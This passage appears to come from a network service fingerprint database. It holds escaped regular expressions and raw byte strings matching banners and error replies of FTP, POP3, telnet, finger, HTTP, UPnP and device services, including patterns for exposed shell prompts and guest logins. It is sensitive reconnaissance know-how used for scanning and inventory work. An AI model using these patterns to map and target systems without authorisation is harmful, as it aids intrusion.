-0301&<\x16\0\x84\xc7\x02\xe0\xe1\xb1\x008\x13\x1e\x0b\x80<\x16\0\xc7\t\x8f\x05\xc0\xf0X\0\x1c\xc2c\x01p\x1e\x0b\x80\xe3c\x01p\xdcX\0\x1c7\x8f\x05\xc0q\x0b\x80\xe3F\xc7\x02\xe0\xb8,\0\x8e\x1b\xb1\x008n\x05\xc0q\xa3\x008n\xb4\x02\xe0\xb8\xd1\x01p\xdch\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\x12\0\x03\0\x04\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\x12\0\r\0\x03\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x9a\x20\xd0Z\x1e\x1b\xa3\*\xf2\xdd\xe2\(\xc3sp&\xda\xe4Yp\xdbET\xf9\x8cc\xc24\*Y\xbe\xb3\xba\xd6%\xf5\xb668\xad\xab>@D<\x01\xdd>\)\xdb\x18\xf55\xd1\xba\x96\x1c\x17\x17\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x01 -\x0f\0\n\0\x01\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\x0b\0\0\0GBXRemote 2 -VTUN server ver \. (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -VTUN server ver \(.*\) (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -250 OK moleSoftware VHCS2 Server Welcomes You !\r\n -TrueWeather\r\n\r\n> -\x96\xfeS\xab -\+ read portFile\n\+ head -1\n\+ find /var/websm/ -([-\w_.]+) xine-ui ([\d.]+) remote server\. Nice to meet you\.\n -Vty password is not set\.\r\n -\r\nUser Access Verification\r\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfe\"\xff\xfd\x1fPassword: -bp[-\w]+: error while loading shared libraries: libstdc\+\+-libc6\.2-2\.so\.3: cannot open shared object file: No such file or directory\n -\0\x0e@........\0\0\0\0\0 -\0\*@.*\0\0\0\0\0 -\0<\xaa\xc5\r\^\xf7\x1b\xd1\xe1a/\xe8\x17P\x9dOb\xbb\x93\x87\xe0\xf3v\x81K\xa4!\xe6\xc7\x01\x977u5A\xd1M\x1b;\xc7\xcb\x87\xb5\x87\xf3~\xc8w\xef\xd3\x87eA\0\^\xbf\xc5\x93i\xf6\x87 -\xa5A\0\x01\0\0\0,\0\0\0\x02\0\0\0L\0\0\0\x08Connect\0\0\0\0x\0\0\0\x0857222\0\0\0 -.\x01.[\x02\x03]\x01\d+\0 -OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n -SuSE Meta pppd \(smpppd\), Version ([\d.]+)\r\n -\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6\x7d\x27\x7d\x22\x7d\x28\x7d\x22\xc7\x7d\x23\x7e -\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80\x7e --=QDS Task Refactoring Dev v([\w._-]+) Debug Tracing LiveView=-\r\nType quit or \^X to close connection\.\r\n\r\n -503 Service Unavailable\r\n\r\n\0 -Microsoft Windows XP \[Version [\d.]+\]\n\(C\) Copyright 1985-\d+ Microsoft Corp\.\n\nC:\\> -HELLO Welcome to Tunnel Vision \(([\d.]+)\)\n -\0\0\0\x04Z(\d)([1-9]\d) -Invalid request string: Request string is: \"\r\" -Feedback\nError=You need unique ID to command ABC! -#connected,all connect count: 1{\"event\":\"device_status\",\"data\":{\"wifi_name\":\"([^\"]+)\",\"wifi_signal\":\d+,\"battery\":\d+,\"batterycharging\":\w+,\"gsm_signal\":\d+,\"sms_unread\":\d+,\"sdcard\":\d+,\"updateinfo\":null}} --\0\0\0\0| p|IBM OS/400 as-servermapd| o|OS/400 -\x99\xf3\0\0\0\0\0\0\xff\xff\xff\xff -\0\0\0\0\0\0\0\x08 -\[AUTHPOINT RESPONSE\]\r\nreturn_code=AUTHPOINT ERROR\r\nreturn_code_text=Error response parsed by base message object: Invalid or missing register #\r\nresponse=\r\nidentifier=\r\napproval_code=\r\n -Unknown command\r\n -Can't fork pty, bye!\n -Message received\n -Use of uninitialized value in transliteration \(tr///\) at /var/jchkmail/user-filter -Connection from \[[\d.]+\]\r\n\r\nEnter your account name and password\.\r\nSorry, there is no guest account\.\r\n\r\nUsername: -\r\nEnter your account name and password\.\r\n\r\nUsername: -\n\x03 -unrecognized op\n\x03 -\nunrecognized op\n\n\x03 -\n(\d+)\n(\d+)\n(\d+) -\xc0\0\x01\0....\0\0\0\x03 -200-At least a module and a command must be specified\r\n200-At least a module and a command must be specified\r\n -\nWelcome to the Computone IntelliServer `([\w._-]+)'\nRunning cnx kernel release ([\w._, -]+)\n\npt-ses day time owner command\n -Idle\r\n -UNKNOWN COMMAND\n -_err=refused%20by%20workers\r\n -ok\r\nunknown command\r\nunknown command\r\n -Expecting SSL \(optional\) and CONFIG as first commands\.\n -X01\r\nX01\r\n -Invalid FT GWADDR / START protocol\n -\x03Not a valid name\. This may because you left it blank or used invalid symbols\. Please try again\.\n -Finger online user list request denied\.\r\n -Username Real name Idletime TTY Remote console location\n -Login Name Tty Idle Login Time Office Office Phone\r\n -\r\nIntegrated port\r\nPrinter Type: Dell Laser Printer ([-\w+.]+)\r\nPrint Job Status: (.*)\r\n -This is ([-\w_.]+) finger server\.\r\n\r\nPlease use username@domain format\.\r\n -\r\nIntegrated port\r\nPrinter Type: Lexmark ([^\r\n]+)\r\n -finger: /var/adm/lastlog open error\nNo one logged on\r\n -Debian GNU/Linux Copyright \(C\) 1993-1999 Software in the Public Interest\n.*You haven't specified a user\.\n\n A general listing is not provided to the public\. -\r\nPrinter Type: Lexmark Optra LaserPrinter\r\n -MSS485 Version V([\w._/-]+)\(([\w._-]+)\) - Time Since Boot: -220 Welcome to Stupid-FTPd server\.\r\n422 Too busy to play with you\.\r\n -520 invalid command\n -\xea\xdd\xbe\xef\0\0\0\x05\0\0\x000\0\0\x000\0\0..\0\0\0\x08\0a\0f\0f\0s\0p\0r\0n\0g\0\0\0\0\0\0\0\0 -220 Inactivity timer = \d+ seconds\. Use 'site idle ' to change\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n -220 \r\n500 Unknown command: \"\"\r\n500 Unknown command: \"\"\r\n -220 ([-.\w]+) FTP Server ready \.\.\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n -220 \"Welcome to Bot FTP service\.\"\r\n331 Please specify the password\.\r\n230 Login successful\. Have fun\.\r\n -220 OK\n226 OK\n -220 Welcome to pyftpd\. Happy downloading\.\r\n500 I'm gonna ignore this command\.\.\. maybe later\.\.\.\r\n -220 ([\w._-]+) server ready\.\r\n502 command not implemented\.\r\n502 command not implemented\.\r\n -220 UnleashX FTP ready\.\r\n503 Login with USER first\.\r\n -220 ps2ftpd ready\.\r\n500 Not understood\.\r\n -\xff\xfb\x01\xff\xfb\x03\xff\xfc\"\r\n\r\n\n\rauthentication failed!\n\rpassword: -\xff\xfc\"\xff\xfb\x01\r\nPassword: \r\nbad password\r\n| p|Campbell Scientific NL-100/105 Ethernet-to-serial bridge telnetd -FlashCONNECT ([\d.]+) invalid message\.\n -\\0\0\0\xd4\x17\0\0\x01\0\0\0\x05\0\0\0\x01\0\0\0\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\nBad connect string! -{type INIT} {up \d+} {auth \d+} {name {([^}]+)}} {ip [\d.]+} {max \d+} {port (\d+)}\r\n -\xf2\xfa\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\0\0\0\0\0\0\0\0 -HTTP/1\.1 501 Not Implemented\r\nCache-Control: no-cache, must-revalidate, max-age=0\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: \d+\r\nConnection: close\r\n\r\n

Not Implemented

Whatever the heck you just requested, I can't generate\. -HTTP/1\.0 501 Document Follows\r\nContent-Type: text/html\r\nContent-Length: 106\r\n\r\n501 Method Not Implemented\r\n

501 Method Not Implemented

\r\n -HTTP/1\.0 400 Bad Request\r\n.*Server: PeopleSoft PSRENSRV/([\w._-]+)\r\n.*PeopleSoft PSRENSRV/[\w._-]+ on http://([\w._-]+):\d+ -<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\t\n\t\t([\w._-]+)\n\t\t[\d.]+\n\t\n\t\n\t\t\n\t\t\tNo destination specified\n\t\t\n\t\n\n\n -0, 0: ERROR: UNKNOWN-ERROR\n -0 , 0 : ERROR : UNKNOWN-ERROR\r\n -0 , 0 : ERROR : INVALID-PORT\r\n - : ERROR : UNKNOWN-ERROR\r\n -0, 0 : ERROR : X-INVALID-REQUEST\r\n -0 , 0 : ERROR : INVALID-PORT\r\n0 , 0 : ERROR : INVALID-PORT\r\n -0, 0 : ERROR : INVALID-PORT\r\n -0,0 : ERROR : INVALID-PORT\r\n -0 , 0 : ERROR :INVALID-PORT\r\n - : USERID : UNIX : ([-\w_]+) - : USERID : UNIX : [a-z]{4,8}\r\n -1 , 1 : USERID : OTHER : chuck-the-bsd-deamon\r\n -, : USERID : UNIX : [^\r\n]+\r\n -\* OK IMAP4 1\.0 server ready\r\n\* BAD Argument\r\n -ERR password required\r\nERR password required\r\n -ERR administrator password required\r\nERR administrator password required\r\n - \r\nSorry, that nickname format is invalid\.\r\r\n -:([-\w_.]+) 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n:[-\w_.]+ 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n -\+OK \r\n-ERR XXX authorization first\r\n -HLO 0 0 \. 0 71\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nLRNP/1\.1\r\n\r\nlistener\r\nEND\r\nERR 0 1 \. 71 80\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\n451 0 Invalid message \(-2001\)\r\nEND\r\nMSG 0 2 \. 151 58\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nCLOSE 0\r\nEND\r\n -ERROR: Command doesn't seem to be followed by a space followed by arguments\n -.\x08\0\0 -500 access denied: Check networking/linuxconf network access\r\n -BEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\nBEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\n -\x02\x02 -ERROR\r\nERROR\r\n -\x82\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -ERROR: Unknown request number\. -ERROR: Invalid password\.\nERROR: Invalid password\.\n -HP OpenView OmniBack II ([-.\w]+): INET, -\0\0\xfa\xda\0\x02 -598::Command not recognized\.\r\n598::Command not recognized\.\r\n| p|Mercury/32 PH addressbook server -\+OK POP3 ([-.+\w]+) v(\d[-.\w]+) server ready\r\n -\+OK POP3 \[([-.+\w]+)\] (\d[-.\w]+) server ready\r\n -\+OK POP3 \[([-.\w]+)\] v(200[-.\w]+) server ready\r\n-ERR Null command\r\n-ERR Null command\r\n -\+OK POP3 server ready\r\n-ERR invalid command\r\n| p/IBM OS 400 pop3d/ o|OS/400 -\+OK pop server ready\r\n -\+OK ([\w._-]+)\r\n-ERR Invalid command in current state\.\r\n-ERR Invalid command in current state\.\r\n --ERR Invalid command\.\r\n-ERR Invalid command\.\r\n -\+OK POP3 ready\r\n-ERR invalid command\r\n -\+OK POP3 Ready ([-\w_.]+) \w+\r\n-ERR Null command, mate\r\n -\+OK POP3Proxy ready\r\n-ERR Unknown command\r\n-ERR Unknown command\r\n -EInvalid packet length\0 -EFATAL 1: invalid length of startup packet\n\0 -\xff -\xc0\0\x12Data field missing -\xff\x17Access to unopened port. -Status: 400 Bad Request\r\nContent-Length: 0\r\n\r\n -\xa8\x08C\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -ERR 27 -\xf1\xf8\xf2\xf6\xf3\xf3\xf0\xf0\xf3\xf8\xf7\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xe2\xf6\xf5\xf6\xf9\xc5\xf9\xc3\0\xf0\xf0\xf3\xf1\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0 -\x05\x01\0.\0\0\0\0\0\0 -\x02\0\x01\xfb\xff\xfb\xff\xff\xff\xff\xffNOSUP -SPAMD/1\.0 76 Bad header line: \r\n -ERHD -\x01\0\0\0 -SSTP/([\d.]+) 400 Bad Request\r\n\r\n\0 -\x01\0\0\0z\0\0\x003,DBServer,\d+,Restarts,\d+,\d+,UpTime,\d+,\d+,MediaServer -\xff\xfb\x03\xff\xfb\x01 -\xff\xfb\x01\xff\xfb\x03\r\nUser:\r\n\r\nUser:\r\n\r\nUser: -514 Authentication required\.\r\n -login: Password: Login incorrect\. -login: uucpd: \d+-\d+ The user is not known\.\n -%rwhois V-[\w:.-]+ ([-\w_.]+) \(by Network Solutions, Inc\. V-([\d.]+)\)\n -% No entries found for the selected source\(s\)\.\n -128 System Incompatible Windows Communicator client or server version\r\n128 System Incompatible Windows Communicator client or server version\r\n -\x02\x01 -SDPACK -\xff\xfe\x01\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfb\x03\xff\xfb\x01\r\nAccount Name: \r\nPassword: \r\nThis copy of the Ataman Telnetd Server is registered as licensed to:\r\n\t(.+)\r\n\r\nLogin failed: unknown user name, password or privilege incorrect\.\r\n -\xff\xfb\x01\xff\xfb\x03\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: -\r\n\r\nThis is a FirstClass system, from Open Text Corporation\.\r\n\r\n\r\nFirstClass is an e-mail and conferencing system with a graphical user interface\.\r\n\r\n\r\nThe Command Line Interface is not available on this sy -\xff\xfb\x01\r\nPassword:\r\nLogged in as guest\r\n -\xff\xfb\x01Login: \r\nLogin: \r\nLogin: -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nuser: \r\npassword: \r\n\r\nuser: -\xff\xfb\x01\n\r-> \n\r-> \n\r-> -bad password\r\n -\xff\xfd\"\xff\xfb\x01SSE version ([\d.]+)\r\nCopyright [\d, ]+ by Motorola\r\nUsername: -\xff\xfb\x01Password\? \r\n500 Configuration error\. Disconnecting!\n -\xff\xfb\x01\r\n\r\nlogin: \r\n\r\n\r\r\npassword: -\xff\xfb\x01\xff\xfb\x03\nTOSHIBA Maintenance Shell\. \n\rUser access verification\.\n\rlogin: -\r\nPress return:\*\*\*\*\r\nEnter Password: -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\0\n\r\0\n\r\0\n\r\0\n- NetQue AppleTalk/NetWare/TCP/LAT Printer Server -\r\n\r\nUser Access Verification\r\n\r\nPassword: \r\nPassword: \r\nPassword: \r\n% Bad passwords\r\n -\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\n\r\nlogin: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nRead /disclaimer\.txt and have fun with yadi on your Nokia D-BOX2 - Kernel ([-\w_.]+) \( -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPhilips D-BOX2 - Kernel ([\w._-]+) \( -\xff\xfb\x01\n\rLogin: \n\r\n\r\n\rLogin: \n\rLogin: - 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n -User Name: \r\r\nPassword: \r\r\nRemote MAC address: -\xff\xfb\x01\r\nAP11G login: \r\n\r\nPassword: -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[H \n\r\0\x1b\[H\x1b\[JPASSaPORT CS-(\d+) SW V([-\w_.]+) , HW V([-\w_.]+)\r\n\r\n -\xff\xfb\x01\xff\xfb\x03\xff\xfb\x1fError2 negotiated with client \d+ and get 1 char is a a d\. \n\r\n\r\*+\n\r\*\* +\*\*\n\r\*\* IP Phone firmware +V([\w._-]+) -\xff\xfd\0\xff\xfd\x03\xff\xfb\0\xff\xfb\x03\xff\xfb\x01\x03\x04\r\nPassword: \r\n\n\rComtrol DeviceMaster RTS ModelID: (\d+) \n\r\rNS-Link ([\w._-]+) \n\rBuilt: .*\n\rIP Addr: [\d.]+ Mask: [\d.]+ Gateway: [\d.]+ \n\rMAC Addr: ([\w ]+) \n\r\n\r\r\n\rdm> \r\nInvalid Command\r\n\rdm> -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfd\x18\r\0\r\nPassword: \r\nPassword incorrect\r\n -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4222\r\nLogin: \r\n\r\nPassword: -\xff\xfe\x01\xff\xfb\x01\xff\xfc\"\xff\xfd\x1flogin: \r\nlogin: \r\nlogin: -\x1b\[24;1HUsername: \x1b\[\?25h\x1b\[24;1H\x1b\[\?25h\x1b\[24;11H\x1b\[24;11H\x1b\[\?25h\x1b\[24;11H\x1b\[24;1H\r\n\r\x1b\[\?25h\x1b\[24;11H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve (\w+) Switch (\w+)\r\n\rSoftware revision ([\w.]+)\r\n -\xff\xfb\x01\xff\xfb\x03\r\nWelcome to IFBD-HE05/06 TELNET Utility\.\r\nCopyright\(C\) 2005 Star Micronics co\., Ltd\.\r\n\r\n<< Connected Device >>\r\n Device Model: (\w+) \(STR_T-001\)\r\n NIC Product : IFBD-HE05/06\r\n MAC Address : ([0-9A-F:]+)\r\n\r\n\r \r\nlogin: \r\n -\xff\xfb\x01\xff\xfb\x03\nLANIER Maintenance Shell\. \n\rUser access verification\.\n\rlogin: -\xff\xfb\x01\r\nUser Name : \r\nUser Name : \r\nUser Name : -\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to VIP-X ([\w._-]+) from [\w._-]+\r\nTLS invalid record length\r\n\r\n\r\n\r\ninvalid username\r\n\r\nTLS version 0300 not supported\r\nenter username -> -\0\0\+\x04\0\0\0@TransBase Multiplexer error report:\nIllegal request - 501 Not Implemented\r\n.*Server: (RT-\w+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n - 501 Not Implemented\r\n.*Server: DrayTek/Vigor([\w._-]+) UPnP/([\w.]+) miniupnpd/([\w.]+)\r\n -HTTP/1\.1 501 Not Implemented\r\nConnection: close\r\nContent-type: text/html\r\n\r\n501 Not Implemented

Not Implemented

The HTTP Method is not implemented by this server\.\r\n - 501 Not Implemented\r\n.*Server: Linux Mips ([\w._-]+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n -HTTP/1\.1 400 Bad Request\r\nServer: Symbian/([\w._-]+) UPnP/([\d.]+)\r\nContent-Length: 151\r\n\r\n\n\n400 Bad Request\n\n

Bad Request

\n
\n -HTTP/1\.1 501 Not Implemented\r\nContent-Type: text/html\r\nConnection: close\r\nContent-Length: 149\r\nServer: Linux/([\w._-]+) DLNADOC/([\w._-]+) UPnP/([\w._-]+) MiniDLNA/([\w._-]+)\r\n -0\x82\x01\n\x02\x82\x01\x01\0 -HTTP/1\.0 400 Bad Request\r\nExpires: .*\r\nContent-Type: text/html\r\n\r\n\nBad formed request or url\n -\xff\xff\xfb& -Status: 400 Bad Request\r\nServlet-Error: Malformed data sent to JServ\r\n\r\n -sh-2\.05b\ -WTAM/1\.0 401 Unrecognized Command\n\n -Command Shell\r\n\r\n% \r\n% -201- connected\r\n407- unknown command\r\n -HELLO XBOX! -ZBXD\x01\x10\0\0\0\0\0\0\0ZBX_NOTSUPPORTED -\*\*\x18B0100000023be50\r\x8a\x11 -<\?xml version=\"1\.0\"\?>\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n -(HTTP/1\.0) 200 OK\r\nServer: Kerio Personal Firewall\r\n -\xf6\xff\xff\xff\x10\0\0\0\0\0\0\0\0\0\0\0 -:[-\w_.]+ 451 GET :\r\n -\n\nDirectory /\n\n\n\n

Directory listing of /

-Nice try\.\.\.\r\n -HTTP/1\.1 401 Unauthorized\r\n.*WWW-Authenticate: negotiate \r\nWWW-Authenticate: digest nonce=\"\d+\", realm=\"/Search\", algorithm=\"md5\"\r\n.*Server: Twisted/([\w._-]+) TwistedWeb/([\w._-]+)\r\n -HTTP/1\.0 302 Found\r\nLocation: http://www\.distributed\.net/\r\n\r\n -\0\x79\xd0\x02\xff\xff\0\x73\x12\x4c\0\x06\x11\x49\0\x08\0\x4e\x11S\0\xd3 -=\0\0\0 -Login name: / \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: GET \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: HTTP/1\.0 \t\t\tIn real life: \?\?\?\r\n -Login name: GET \t\t\tIn real life: \?\?\?\r\n - +-;;=\n +\.;M####\+\n -User not found\r\n -EMail : [-\w_.]+@([-\w_.]+)\r\n Real Name : \?\?\r\n Home Page : \?\?\r\n -Login name: HTTP/1\.0 In real life: \?\?\?\r\n -3That item is not currently available\.\r\n -\0\0\0\0/\x20HT -HTTP/1\.1 302 Moved\r\nContent-type: text/html\r\nConnection: close\r\nLocation: /1[012]\d{8}/l\r\n\r\n

Document -HTTP/1\.[01] \d\d\d .*\r\nServer: Xitami\r\n -HTTP/1\.[01] \d\d\d .*\r\nServer: JRun Web Server\r\n -HTTP/1\.1 403 Forbidden\r\nServer: Web Server\r\n\r\n -HTTP/1\.1 301 Moved Permanently\r\nServer: Web Server\r\nLocation: .*\r\nContent-Type: text/html\r\nContent-Length: \d+\r\n\r\nMovedMoved\r\n -HTTP/1\.1 200 OK\r\nContent-Type: text/html\r\n\r\n.*MiniShare\r\n.*Total: (\d+) files([^<]+) -HTTP/1\.0 \d\d\d .*\r\nServer: Quantum Corporation\./([\d.]+)\r\n -HTTP/1\.0 200 \(OK\) \r\nPragma: No-Cache\r\nCache-Control: no-cache\r\nDate: .*\r\nServer: HTTP Server\r\n.*Copyright \d+, \d+ Nortel Networks\. -HTTP/1\.1 \d\d\d .*\r\nServer: Jigsaw/([\w.-]+)\r\n -HTTP/1\.1 \d\d\d .*\r\nDate: .*\r\nServer: ENI-Web/R([\d_]+)\r\nWWW-Authenticate: Basic realm=\"standard@Modem\"\r\n\r\n -HTTP/1\.0 \d\d\d .*\r\nPragma: no-cach\r\nContent-Type: text/html; charset=windows-1251\r\n\r\n\r\n\r\nUserGate report area\r\n -HTTP/1\.0 200 Ok\r\nServer: httpd\r\nDate: .*\nWL700g Web Manager -HTTP/1\.0 200 OK\r\nConnection: close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n\r\n\r\n\r\n8 Port Gigabit Switch\r\n -HTTP/1\.0 303 Redirecting\r\nServer: httpd/[\d.]+ Python/([\d.]+)\r\n.*Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0\r\n.*: Redirecting\n\n

For more printserver info please open the [\d.]+ home page -:Default-Chat-Community 421 \* GET :Unknown command\r\n -:([-\w_.]+) 451 :You have not registered your connection\r\n -<\?xml version='1\.0'\?> -Invalid XML -Invalid XML -<\?xml version='1\.0' encoding='UTF-8'\?>\n\n -JAMES Remote Administration Tool ([\d.]+)\nPlease enter your login and password\nLogin id:\n -\0\0\0.~\x81.0\x81..\x03\x02\x01\x05.\x03\x02\x01\x1e.\x11\x18\x0f -ERR unknown_command Unknown\+server\+command\r\n -..\x0a\0x\x01 -ERROR\n -1INVALID REQUEST -\xfb\xff\xfe\xff\xfb\xff\xfe\xff\xfb\xff\xfe\xff| p|Novell NetWare/IP -SOURCETABLE 200 OK\r\nServer: NTRIP Caster ([\w._-]+)/([\w._-]+)\r\nContent-Type: text/plain\r\n -\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol -\xe3\r\n\r\n\0\x01\0\x03\x0b\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol --ERR \[SYS/PERM\] Fatal error: tls_start_servertls\(\) failed\r\n --ERR Fatal error: pop3s: required OpenSSL options not present\r\n -EFATAL: invalid length of startup packet\n\0 -action=dunno\n\n --ERR wrong number of arguments for 'get' command\r\n -0 serverclose 0\n -HTTP/1\.0 401 Unauthorized\r\nConnection: close\r\nContent-Type: text/html; charset=ISO-8859-1\r\nWWW-Authenticate: Basic realm=\"server\r\nContent-Length: 166\r\n -HTTP/1\.0 200 OK\r\nServer: SetiQueue/(\d+)\r\n -ICY \d\d\d .*SHOUTcast Distributed Network Audio Server/posix.v([\d.]+) -HTTP/1\.1 405 Method Not Allowed\r\nDate:0000-01-01T18:54:43\r\nContent-Type: application/soap\+xml; charset=\"utf-8\"\r\n\r\n -\xff\xfb\x03\xff\xfb\x01\xff\xfbi\r\n\tWelcome to Magicunix's TCP Server\.\r\n\r\n\r\nLogin: P/1\.0\r\nPassword: \r\nLogin incorrect\r\nLogin: -\xff\xfb\x01\xff\xfb\x03telnet@CER(\w+)>GET / HTTP/1\.0\r\nInvalid input -> GET / HTTP/1\.0\r\nType \? for a list\r\n -HTTP/1\.0 503 Directory busy, try again later\r\n\r\n -HTTP/1\.1 \d\d\d .*\r\nWWW-Authenticate: Basic realm=\"([\w._-]+)\"\nEXT:\r\nServer: *Linux/([\w._-]+), UPnP/([\w._-]+), pvConnect UPnP SDK/([\w._-]+)\r\n -HTTP/1\.1 200 OK\r\nDate: .*\r\nServer: Linux/2\.x UPnP/([\w._-]+) Avtech/([\w._-]+)\r\nConnection: close\r\nLast-Modified: .*\xb2\xe8\xbe\x1c\xb2\xe8\xbe\x38\x62\x03\r\n -login: Login incorrect\. -HTTP/1\.0 404 Not Found\r\nDate: .*\r\nServer: ByllSoftware Gurda/([\d.]+)\r\n -HTTP/1\.0 401 Unauthorized\r\n\r\n

401 - Authorization Failed

